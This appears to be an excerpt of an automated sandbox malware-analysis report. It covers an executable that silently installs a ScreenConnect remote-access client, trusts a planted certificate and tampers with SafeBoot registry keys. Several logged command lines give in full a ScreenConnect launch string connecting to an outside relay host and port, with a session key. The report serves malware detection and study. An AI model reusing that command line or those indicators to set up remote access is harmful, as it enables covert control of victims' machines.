                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1897708665.0000000000B5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
                  Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B6191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B6191F
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B61000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00B61000
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B63677 mov eax, dword ptr fs:[00000030h]0_2_00B63677
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B66893 GetProcessHeap,0_2_00B66893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B61493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B61493
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B6191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B6191F
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B64573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B64573
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B61AAC SetUnhandledExceptionFilter,0_2_00B61AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 652 -ip 652Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 844Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\q0b52qgm.675\bv2jh5rm.ncd\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\q0b52qgm.675\bv2jh5rm.ncd\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%20session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\q0b52qgm.675\bv2jh5rm.ncd\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%20session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B61BD4 cpuid 0_2_00B61BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B61806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B61806
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Deletes keys which are related to windows safe boot (disables safe mode boot)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (41bb451f-21e9-4165-b8b1-29146c1a400a)
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 10.0.ScreenConnect.WindowsClient.exe.a30000.0.unpack, type: UNPACKEDPE
